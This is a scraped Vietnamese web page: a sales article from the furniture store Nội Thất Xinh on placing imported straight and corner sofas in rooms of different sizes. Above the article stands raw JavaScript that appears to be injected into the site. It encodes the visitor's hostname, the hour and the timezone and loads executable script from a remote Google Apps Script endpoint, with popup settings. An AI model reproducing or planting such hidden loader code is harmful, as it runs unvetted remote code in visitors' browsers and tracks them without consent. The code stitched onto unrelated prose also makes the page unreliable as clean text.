var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Sử dụng các loại ghế sofa nhập khẩu trong không gian

Tùy theo các loại ghế sofa nhập khẩu có kiểu dáng như thế nào mà sử dụng sao cho thật phù hợp trong không gian sống.

Căn phòng có diện tích và thiết kế thế nào sẽ chọn sofa nhập khẩu hà nội có kiểu dáng tương ứng như vậy. Hãy cùng tìm hiểu xem cách sử dụng các loại sofa nhập trong từng không gian như thế nào nhé.

Sử dụng các loại ghế sofa nhập khẩu trong không gian

Ghế sofa nhập dạng văng

Với sofa văng nhập có hai loại là sofa văng chữ I và sofa văng bộ. Sofa văng chữ I cực kì thích hợp với những phòng khách có diện tích nhỏ, khiêm tốn. Nó sẽ dễ dàng bố trí, sắp xếp cùng thảm sofa và bàn trà, tiết kiệm diện tích tối đa.

các loại ghế sofa nhập khẩu
Sofa văng nhập khẩu chữ I thích hợp cho những căn phòng có diện tích khiêm tốn

Với sofa văng bộ có thể dùng trong các phòng khách rộng, văn phòng làm việc. Chúng cần có diện tích rộng thì mới dễ dàng bố trí. Sofa văng bộ đem lại không gian cực kì sang và đẳng cấp.

các loại ghế sofa nhập khẩu
Phòng khách rộng hay không gian văn phòng sẽ phù hợp với sofa văng bộ nhập khẩu

Ghế sofa nhập khẩu dạng góc


 

Với sofa góc nguồn gốc nhập khẩu bạn có thể dùng cho nhiều các không gian khác nhau. Với phòng khách nhỏ chọn sofa góc có kích thước nhỏ, phòng khách lớn chọn sofa góc có kích thước lớn. Loại ghế sofa này dễ dàng bố trí và sắp xếp, tạo sự sang trọng và hiện đại nhất.

các loại ghế sofa nhập khẩu
Ghế sofa góc nhập khẩu có thể dùng cho nhiều các không gian sống khác nhau

Ghế sofa nhập khẩu cao cấp có tại Nội Thất Xinh

Tùy theo từng không gian để bạn sử dụng các loại ghế sofa nhập sao cho phù hợp. Mua bàn ghế sofa nhập khẩu cao cấp hãy đến ngay với Nội Thất Xinh. Với rất nhiều mẫu sofa nhập đẹp như sofa góc, sofa văng sẽ giúp bạn có được không gian đẹp nhất, sang nhất. 

=> Tham khảo:  Lựa chọn kiểu dáng ghế sofa ban công phù hợp nhất